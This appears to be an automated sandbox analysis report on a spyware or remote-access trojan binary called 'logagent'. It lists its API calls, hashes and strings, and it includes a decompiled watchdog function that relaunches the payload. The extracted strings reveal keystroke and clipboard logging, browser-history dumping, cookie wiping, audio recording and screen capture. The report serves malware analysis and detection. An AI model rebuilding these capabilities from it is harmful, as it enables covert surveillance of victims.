                                  • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                  • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                  • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                  • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                  • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Write$Create
                                  • String ID: RIFF$WAVE$data$fmt
                                  • API String ID: 1602526932-4212202414
                                  • Opcode ID: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction ID: 91b5b913efd348db76e64cf746c5e08b94ff9205a7cc9a5ceb03776573d28bcb
                                  • Opcode Fuzzy Hash: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction Fuzzy Hash: 6F411CB654021CBAD7109BA1DC89FEB7FBCEBC5B10F008416BA06EA181D674D744CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401B26 Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 105sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(000000FA), ref: 00401C24
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                  Strings
                                  • /sort "Visit Time" /stext ", xrefs: 00401B97
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                  • String ID: /sort "Visit Time" /stext "
                                  • API String ID: 1247708949-1573945896
                                  • Opcode ID: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction ID: 821258ceffa38abf0b50ebb2211f36aec7c07e94205cba95cd2ca02b6bdb4f84
                                  • Opcode Fuzzy Hash: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction Fuzzy Hash: B131127290050DEBCB04EBE0ED4D9DE777CEB58345F104036F902E7090EA759A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105513D5 Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 318windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDCA.GDI32(00416A4C,00000000,00000000,00000000), ref: 105513EB
                                  • CreateCompatibleDC.GDI32(00000000), ref: 105513F7
                                    • Part of subcall function 1055185D: GetMonitorInfoW.USER32(?,?), ref: 1055187D
                                    • Part of subcall function 105518A7: GetMonitorInfoW.USER32(?,?), ref: 105518C7
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 1055143B
                                  • DeleteObject.GDI32(00000000), ref: 10551457
                                  • SelectObject.GDI32(?,00000000), ref: 10551469
                                  • DeleteObject.GDI32(?), ref: 10551484
                                  • GlobalFree.KERNEL32(?), ref: 10551759
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateObject$CompatibleDeleteInfoMonitor$BitmapFreeGlobalSelect
                                  • String ID: $BM
                                  • API String ID: 472775371-1947242164
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: fee22f74d9fa04e84cf6f9cc9b495b9ae881ea934d950e169d8773cc09b52954
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 6BC1F67590020EEFCF119FA0DC889DEBFB9FF48354F10842AE905A6160DB31AA59DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406952 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,746B73F0,?), ref: 0040697B
                                  • toupper.MSVCRT ref: 0040698A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                  • toupper.MSVCRT ref: 00406A61
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 004069D7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 00406A01
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 00406A0B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,746B73F0,?), ref: 00406A1D
                                  • tolower.MSVCRT ref: 00406A3A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                  Strings
                                  • [End of clipboard text], xrefs: 004069EC
                                  • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                  • [Ctrl + , xrefs: 00406996
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                  • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                  • API String ID: 1567161615-398269065
                                  • Opcode ID: f055b0a47fed377ab138603d79dccd8f7202f2c89e84a5b9c4b01e99b008c5f4
                                  • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                  • Opcode Fuzzy Hash: f055b0a47fed377ab138603d79dccd8f7202f2c89e84a5b9c4b01e99b008c5f4
                                  • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407767 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 00407779
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                  • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 4038348890-4073444585
                                  • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                  • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054C295 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 271sleepsynchronizationstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 35%
                                  			E1054C295(void* __eflags, long _a4) {
				char _v5;
				void* _v12;
				char _v28;
				void _v530;
				signed short _v532;
				short _v548;
				short _v1068;
				short _v1588;
				short _v2108;
				void* _t39;
				void* _t40;
				void* _t43;
				void* _t49;
				long _t52;
				void* _t54;
				char _t55;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t61;
				void* _t71;
				void* _t72;
				char _t75;
				char _t76;
				void* _t77;
				char _t86;
				void* _t90;
				void* _t92;
				void* _t103;
				char _t105;
				intOrPtr* _t108;
				void* _t141;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				CreateMutexA(0, 1,  *0x41b15c);
				GetModuleFileNameW(0,  &_v2108, 0x104);
				_t39 =  *0x4152ec();
				_t40 =  *0x415344();
				_t43 = E1054D021(0x80000001,  *0x415344(), 0x4163e0,  &_v548, 0x208, _t40, _t39);
				_t154 = _t153 + 0x1c;
				if(_t43 == 0) {
					exit(0);
				}
				 *0x41534c( &_v5);
				if(E1055476E( &_v548,  &_v28) == 0) {
					exit(_t141);
				}
				while(1) {
					_t49 = OpenProcess(0x100000, _t141, _a4);
					_v12 = _t49;
					WaitForSingleObject(_t49, 0xffffffff);
					CloseHandle(_v12);
					_t52 = GetCurrentProcessId();
					_t54 = E1054D1B8(0x80000001,  *0x415344(), "WDH", _t52);
					_t155 = _t154 + 0x10;
					if(_t54 == 0) {
						break;
					}
					if(PathFileExistsW( &_v548) != 0) {
						L7:
						ShellExecuteW(_t141, 0x41578c,  &_v548, _t141, _t141, 1);
						L10:
						do {
							L11:
							_t86 = E1054CE57(0x41ba38, 0x80000001,  *0x415344(), 0x416524,  &_a4);
							_t155 = _t155 + 0x10;
							_v5 = _t86;
							_t165 = _t86;
							if(_t86 == 0) {
								Sleep(0x1f4);
							} else {
								_push( *0x415344(0x416524));
								_push(0x80000001);
								E1054D2EA(_t165);
								_t155 = _t155 + 0xc;
							}
						} while (_v5 == 0);
						_t141 = 0;
						continue;
					}
					_t90 =  *0x4152ec();
					_t92 = E105546E5( &_v28,  *0x415344(), _t90,  &_v548, _t141);
					_t155 = _t155 + 0x10;
					if(_t92 == 0) {
						memset( &_v1588, 0, 0x82 << 2);
						GetTempPathW(0x104,  &_v1588);
						GetTempFileNameW( &_v1588, 0x4168b4, 0,  &_v1068);
						lstrcatW( &_v1068, 0x4168a8);
						_t103 =  *0x4152ec();
						_t105 = E105546E5( &_v28,  *0x415344(), _t103,  &_v1068, 0);
						_t155 = _t155 + 0x1c;
						__eflags = _t105;
						if(_t105 == 0) {
							goto L11;
						}
						__eflags = 0;
						ShellExecuteW(0, 0x41578c,  &_v1068, 0, 0, 1);
						goto L10;
					}
					goto L7;
				}
				exit(1);
				_t156 = _t155 - 0x208;
				_t108 =  *0x415208;
				_t55 =  *_t108(0x41ba28, 0x415800, _t141, 0x80000001, 0x41ba38, _t151);
				__eflags = _t55;
				if(_t55 == 0) {
					L21:
					__eflags =  *0x41bd68;
					if( *0x41bd68 == 0) {
						L26:
						__eflags = 0;
						return 0;
					}
					do {
						Sleep(0xbb8);
						__eflags =  *0x41ba21;
						if(__eflags != 0) {
							E105496E2(0x41ba48,  *0x41ba58,  *0x41bc64,  *0x41ba20,  *0x41532c());
							_t156 = _t156 + 0x10;
						}
						_t57 =  *0x4152ec();
						_t58 =  *0x415344();
						_t59 =  *0x41520c();
						_t61 =  *0x41532c();
						E1054D287(__eflags, 0x80000001,  *0x415344(), 0x4163e0, _t61, _t59 + _t59 + 2, _t58, _t57, 3);
						_t156 = _t156 + 0x20;
						__eflags =  *0x41bd68;
					} while ( *0x41bd68 != 0);
					goto L26;
				}
				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x81 << 2);
				asm("stosw");
				_t71 =  *0x4152ec();
				_t72 =  *0x415344();
				_t75 = E1054D021(0x80000001,  *0x415344(), 0x4163e0,  &_v532, 0x410, _t72, _t71);
				_t156 = _t156 + 0x28;
				__eflags = _t75;
				if(_t75 != 0) {
					 *0x415204( &_v532);
				}
				_t76 =  *_t108(0x41ba28, 0x415800);
				__eflags = _t76;
				if(_t76 == 0) {
					goto L21;
				} else {
					_t77 = 1;
					return _t77;
				}
			}








































                                  0x1054c2a1
                                  0x1054c2ac
                                  0x1054c2bf
                                  0x1054c2cc
                                  0x1054c2d5
                                  0x1054c301
                                  0x1054c306
                                  0x1054c30b
                                  0x1054c30e
                                  0x1054c30e
                                  0x1054c31b
                                  0x1054c335
                                  0x1054c338
                                  0x1054c338
                                  0x1054c33e
                                  0x1054c347
                                  0x1054c350
                                  0x1054c353
                                  0x1054c35c
                                  0x1054c362
                                  0x1054c378
                                  0x1054c37d
                                  0x1054c382
                                  0x00000000
                                  0x00000000
                                  0x1054c397
                                  0x1054c3c1
                                  0x1054c461
                                  0x1054c461
                                  0x1054c467
                                  0x1054c467
                                  0x1054c47b
                                  0x1054c480
                                  0x1054c483
                                  0x1054c486
                                  0x1054c488
                                  0x1054c4a4
                                  0x1054c48a
                                  0x1054c493
                                  0x1054c494
                                  0x1054c495
                                  0x1054c49a
                                  0x1054c49a
                                  0x1054c4aa
                                  0x1054c4b0
                                  0x00000000
                                  0x1054c4b0
                                  0x1054c3a4
                                  0x1054c3b5
                                  0x1054c3ba
                                  0x1054c3bf
                                  0x1054c3e4
                                  0x1054c3f2
                                  0x1054c40d
                                  0x1054c41f
                                  0x1054c431
                                  0x1054c442
                                  0x1054c447
                                  0x1054c44a
                                  0x1054c44c
                                  0x00000000
                                  0x00000000
                                  0x1054c44e
                                  0x1054c461
                                  0x00000000
                                  0x1054c461
                                  0x00000000
                                  0x1054c3bf
                                  0x1054c4b9
                                  0x1054c4c2
                                  0x1054c4c9
                                  0x1054c4db
                                  0x1054c4e3
                                  0x1054c4e6
                                  0x1054c571
                                  0x1054c571
                                  0x1054c578
                                  0x1054c612
                                  0x1054c612
                                  0x00000000
                                  0x1054c612
                                  0x1054c583
                                  0x1054c588
                                  0x1054c58e
                                  0x1054c595
                                  0x1054c5b5
                                  0x1054c5ba
                                  0x1054c5ba
                                  0x1054c5c1
                                  0x1054c5ca
                                  0x1054c5d3
                                  0x1054c5e0
                                  0x1054c5fd
                                  0x1054c602
                                  0x1054c605
                                  0x1054c605
                                  0x00000000
                                  0x1054c583
                                  0x1054c4ec
                                  0x1054c501
                                  0x1054c505
                                  0x1054c507
                                  0x1054c510
                                  0x1054c539
                                  0x1054c53e
                                  0x1054c541
                                  0x1054c543
                                  0x1054c551
                                  0x1054c551
                                  0x1054c561
                                  0x1054c564
                                  0x1054c567
                                  0x00000000
                                  0x1054c569
                                  0x1054c56b
                                  0x00000000
                                  0x1054c56b

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 1054C2AC
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1054C2BF
                                    • Part of subcall function 1054D021: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 1054D03B
                                    • Part of subcall function 1054D021: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,80000001,10544BEE,0041BA38), ref: 1054D057
                                    • Part of subcall function 1054D021: RegCloseKey.ADVAPI32(?), ref: 1054D062
                                  • exit.MSVCRT ref: 1054C30E
                                  • exit.MSVCRT ref: 1054C338
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 1054C347
